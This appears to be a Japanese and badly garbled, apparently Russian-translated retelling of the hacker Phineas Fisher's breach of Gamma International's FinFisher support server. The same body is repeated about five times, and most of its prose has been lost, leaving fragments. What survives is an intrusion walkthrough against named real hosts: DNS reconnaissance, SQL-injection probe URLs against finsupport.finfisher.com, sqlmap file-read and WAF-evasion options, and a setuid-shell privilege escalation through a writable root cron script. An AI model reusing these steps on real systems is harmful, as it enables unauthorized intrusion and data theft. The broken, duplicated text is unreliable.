

8月3日、 subreddit / r / Anarchismで、 PhineasFisherのユーザーは、 Gamma Internationalから40ギガバイトのさまざまなデータを盗むことができると報告したスレッドを作成しました。 おそらく、このヨーロッパの会社が従事しているビジネスのためでなければ、そのような話はそれほど注目されていなかったかもしれません。 最初のメッセージの数日後、クラッカーは、彼がどのようにしてガンマインターナショナルサーバーに侵入し、そこで見つけたものかについての長い話を投稿しました。


冒頭、小さな余談と、ハッカーがガンマインターナショナルに興味を持っていることについての話。 特に、この会社はFinFisherソフトウェアスイートを配布しています 。これは、「 政府機関が使用するために作成された侵入およびリモート監視用のソフトウェアソリューション 」と呼ばれています 。 主に中東のいくつかの州は、このスパイシステムの交渉または使用で有罪判決を受けましたが、これらの事実は広く公表され調査されていませんでした。


2012年、バーレーンの野党活動家の多くは、添付ファイル付きのメールを受け取りました。写真やその他の文書を含む.rarアーカイブ。多機能のトロイの木馬が車に侵入しました。 ファイルの名前、たとえばexe.Image.jpgは一見「正しい」ように見えますが、アラブ諸国向けにローカライズされたシステムでは、右から左にgpj.egamI.exeことになっており、システムのファイルはイメージではなく実行可能ファイルgpj.egamI.exeあることが判明しgpj.egamI.exe CitizenLabのメンバーはこの攻撃の調査を引き受けました。


フォルダーにコピーされたトロイの木馬 C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
